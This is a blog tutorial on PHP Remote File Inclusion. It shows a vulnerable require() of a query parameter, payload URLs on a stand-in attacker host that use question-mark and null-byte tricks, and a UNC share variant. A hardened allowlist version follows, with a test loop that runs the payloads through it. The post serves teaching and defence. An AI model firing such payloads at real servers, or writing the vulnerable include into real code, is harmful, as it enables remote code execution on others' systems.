Remote File Inclusion

Seriously. RFIs are outdated, really outdated.
But I can't possibly release an article on exploiting LFIs without releasing one about RFIs.
It's like saying A without saying B, and that is just plain annoying.

Okay, now on to it.

Before I get started, just to point out: RFI = Remote File Inclusion. Period.

Say a developer made a page containing code similar to this:

<? require($_GET['page'].'.php'); ?>

His intention might have been to just include his fancy-pants corporate "About-Us" page.
However, older PHP versions let include/require fetch remote URLs by default: before PHP 5.2 that was governed by allow_url_fopen, which is On by default, and only PHP 5.2 introduced the separate allow_url_include switch, which defaults to Off. (Apache has no say in it; the include is done by PHP.) Yes. Harmful, right?

Say this developer's URL looked like this:

http://www.some.company.com/index.php?page=About-Us

With some basic tampering of the page variable, the attacker (malicious employee?)
could, with great success, simply change About-Us to, let's say:

http://evil.employee.com/evil/php.txt?

...or...

http://evil.employee.com/evil/php.txt%00

The developer's code would simply append .php to the end of the "path" and start including it.
Through that flaw, the evil employee's code would get executed on the corporation's server.

Notice that the employee's code was written in a text file.
The only reason he did that was so that when the corporation's server went off to fetch the remote code from the employee's server,
it would come back untouched and unexecuted by the employee's server.

As in, if the employee had saved it as .php on his own server, his code would just have been executed there when the corporation requested it, and only its output would have been sent back.
He would simply exploit himself.

The two other tricks the employee used were the question mark and the Poison Null Byte method (mentioned in the LFI post).

The question mark took the .php that the developer's code appends and turned it into the query string of the request towards the employee's own server, like this:

http://evil.employee.com/evil/php.txt?.php

As mentioned before, the null byte is used to terminate strings (among other things), which under some conditions would have worked just as well as the question mark. The condition here is the PHP version: since PHP 5.3.4, include/require reject any path that contains a null byte, so this trick only works on older installs.

http://evil.employee.com/evil/php.txt%00

PHP would cut the requested string off at the null byte, so the .php suffix never made it into the request, and the request went through.

That's about it. No fancy tricks.

...

Okay, one then.

You don't have to include pages over HTTP.
Think... Network Shares?

Try to include:

\\evil_box\on\LAN\malicious.txt

On a Windows server a UNC path like that is, to PHP, just a filesystem path: no URL wrapper is involved, so allow_url_include=Off does not stop it; the server's own SMB client does the fetching.

You get the gist of it now; other protocols (PHP stream wrappers such as ftp://) might work (have worked) just as well, it's for you to discover.
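To put the require() snippet at the top of the post next to what it should have looked like, here is an added example (not code from the original post): the vulnerable include, a hardened version that maps the page parameter onto a fixed allowlist instead of building a path from it, and a loop that runs the post's own payloads (question mark, null byte, UNC path) through the allowlist check. The page directory, the page names and the function names are assumptions made for this example.

```php
<?php
// Added example, not the original post's code.
//
// The post's vulnerable pattern: the page name comes straight from the query string
// and gets ".php" glued on. With allow_url_include=On (or, before PHP 5.2, just
// allow_url_fopen=On) any of these values makes PHP fetch and execute remote code:
//   ?page=http://evil.employee.com/evil/php.txt?     -> ".php" becomes the query string
//   ?page=http://evil.employee.com/evil/php.txt%00   -> ".php" is cut off (PHP < 5.3.4)
//   ?page=\\evil_box\on\LAN\malicious.txt%00         -> UNC path, no URL wrapper needed on Windows
function vulnerable_include(string $page): void
{
    require($page . '.php');
}

// Hardened form: the untrusted value is only ever used as a lookup key.
// PAGE_DIR and the page list are assumptions for this example.
const PAGE_DIR = __DIR__ . '/pages';
const PAGES = [
    'About-Us' => 'about-us.php',
    'Contact'  => 'contact.php',
];

// Returns the absolute path of the page file, or null if the request is not allowed.
function safe_page_path(string $page): ?string
{
    // Exact-match lookup: a URL, a UNC path, a null byte or "../" can never equal a key.
    if (!array_key_exists($page, PAGES)) {
        return null;
    }
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . PAGES[$page]);
    // Belt and braces: the resolved file must still live inside PAGE_DIR.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

function safe_include(string $page): void
{
    $path = safe_page_path($page);
    if ($path === null) {
        http_response_code(404);
        echo 'No such page';
        return;
    }
    require $path;
}

// Constructed inputs: the legitimate value plus the payloads from the post.
$tests = [
    'About-Us',
    'http://evil.employee.com/evil/php.txt?',
    "http://evil.employee.com/evil/php.txt\0",
    '\\\\evil_box\\on\\LAN\\malicious.txt',
];
foreach ($tests as $t) {
    $verdict = safe_page_path($t) === null ? 'rejected' : 'allowed';
    printf("%-45s %s\n", addcslashes($t, "\0"), $verdict);
}
```

Run it with `php rfi.php`; the three payloads print "rejected" regardless of PHP version or ini settings, and "About-Us" prints "allowed" only once pages/about-us.php actually exists. The allowlist is what does the work here; keeping allow_url_include=Off in php.ini is still worth doing, but as the UNC example shows it is not a substitute for never building an include path from user input.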

Ciao bella.

RFI-Locations:
http://ha.ckers.org/weird/rfi-locations.dat

Mirror:
http://h.ackack.net/download/miscellaneous-mirrors/text-files/rfi-locations-dat

Hey, I'm Fredrik. I'm from Sweden, born 1990, and I have a huge interest in information technology and information security. So far, I've been studying for three years at the International IT College of Sweden and one year at the Royal Institute of Technology (Kista, Sweden). I'm one of the Co-Founders of Detectify. I'm working closely together with the Swedish firm Young & Skilled. ...Not to forget, I'm the previous founder of Arctic Security. If you wish to contact me, please email me at h@ackack.net or follow me on twitter @Almroot.

1 Comment

  1. Tweets that mention Remote File Inclusion: -- Topsy.com says:

    [...] This post was mentioned on Twitter by Tech & Friki Stuff. Tech & Friki Stuff said: Remote File Inclusion: http://ur1.ca/zcbd [...]